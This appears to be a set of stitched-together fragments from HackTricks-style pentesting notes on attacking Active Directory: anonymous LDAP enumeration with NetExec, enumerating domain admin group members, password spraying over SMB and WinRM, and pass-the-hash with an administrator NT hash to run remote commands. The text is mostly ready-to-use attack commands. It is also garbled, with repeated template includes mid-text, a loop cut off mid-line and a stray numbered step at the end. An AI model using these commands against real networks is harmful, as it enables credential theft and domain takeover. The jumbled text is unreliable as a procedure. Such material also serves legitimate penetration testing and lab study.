[LDAP anonymous binds](https://docs.microsoft.com/en-us/troubleshoot/windows-server/identity/anonymous-ldap-operations-active-directory-disabled) allow**unauthenticated attackers** to retrieve information from the domain, such as a complete listing of users, groups, computers, user account attributes, and the domain password policy. This is a**legacy configuration**, and as of Windows Server 2003, only authenticated users are permitted to initiate LDAP requests.\

However, admins may have needed to**set up a particular application to allow anonymous binds** and given out more than the intended amount of access, thereby giving unauthenticated users access to all objects in AD.

If null/anonymous bind is allowed, you can pull users, groups, and attributes directly via NetExec’s LDAP module without creds. Useful filters:

- (objectClass=*) to inventory objects under a base DN

- (sAMAccountName=*) to harvest user principals

Examples:

netexec ldap<DC_FQDN> -u'' -p'' --query"(objectClass=*)"""

netexec ldap<DC_FQDN> -u'' -p'' --query"(sAMAccountName=*)"""

netexec ldap<DC_FQDN> -u'' -p'' --query"(sAMAccountName=*)""" \

| awk -F':''/sAMAccountName:/ {print $2}'| sort -u> users.txt

What to look for:

- sAMAccountName, userPrincipalName

- memberOf and OU placement to scope targeted sprays

- pwdLastSet (temporal patterns), userAccountControl flags (disabled, smartcard required, etc.)

Note: If anonymous bind is not permitted, you’ll typically see an Operations error indicating a bind is required.

If you have valid credentials to login into the LDAP server, you can dump all the information about the Domain Admin using:

./list-groups-for-user<username>

./lsa list-groups-for-user<username>

./enum-users| grep"Name:"| sed -e"s,\\\,\\\\\\\,g"| awk'{print $2}'|whileread name;do ./list-groups-for-user"$name";echo -e"========================\n";done

./enum-users| grep"Name:"| sed -e"s,\\,\\\\\\,g"| awk'{print $2}'|whileread name;do ./list-groups-for-user"$name";echo -e"========================\n";done

./enum-members --by-name"domain admins"

./lsa enum-members --by-name"domain admins"

./enum-groups| grep"Name:"| sed -e"s,\\\,\\\\\\\,g"| awk'{print $2}'|whileread name;doecho"$name"; ./enum-members --by-name"$name";echo -e"========================\n";done

./enum-groups| grep"Name:"| sed -e"s,\\,\\\\\\,g"| awk'{print $2}'|whileread name;doecho"$name"; ./enum-members --by-name"$name";echo -e"========================\n";done

./adtool -a search-user --name CN="*" --keytab=/etc/krb5.keytab -n<Username>| grep"CN"|whileread line;do

-[HTB: Baby — Anonymous LDAP → Password Spray → SeBackupPrivilege → Domain Admin](https://0xdf.gitlab.io/2025/09/19/htb-baby.html)

-[NetExec (CME successor)](https://github.com/Pennyw0rth/NetExec)

-[Microsoft: Anonymous LDAP operations to Active Directory are disabled](https://docs.microsoft.com/en-us/troubleshoot/windows-server/identity/anonymous-ldap-operations-active-directory-disabled)

{{#include ../banners/hacktricks-training.md}}

crackmapexec smb --local-auth 10.10.10.10/23 -u administrator -H 10298e182387f9cab376ecd08491764a0| grep +

- Using**NetExec (CME successor)** for targeted, low-noise spraying across SMB/WinRM:

netexec smb<DC_IP> --generate-hosts-file hosts&& cat hosts /etc/hosts| sudo sponge /etc/hosts

netexec smb<DC_FQDN> -u users.txt -p'Password123!' \

--continue-on-success --no-bruteforce --shares

netexec winrm<DC_FQDN> -u<username> -p'Password123!' -x"whoami"

sudo ntpdate<DC_FQDN>

- Using[**kerbrute**](https://github.com/ropnop/kerbrute) (Go)

-[HTB Sendai – 0xdf: from spray to gMSA to DA/SYSTEM](https://0xdf.gitlab.io/2025/08/28/htb-sendai.html)

-[HTB: Baby — Anonymous LDAP → Password Spray → SeBackupPrivilege → Domain Admin](https://0xdf.gitlab.io/2025/09/19/htb-baby.html)

{{#include ../../banners/hacktricks-training.md}}

5. Post-extraction: Pass-the-Hash to DA

netexec winrm<DC_FQDN> -u Administrator -H<ADMIN_NT_HASH> -x"whoami"

netexec smb<DC_FQDN> -u Administrator -H<ADMIN_NT_HASH> --exec-method smbexec -x cmd

1. Set up NTFS filesystem for SMB server on attacker machine and cache SMB credentials on the target machine.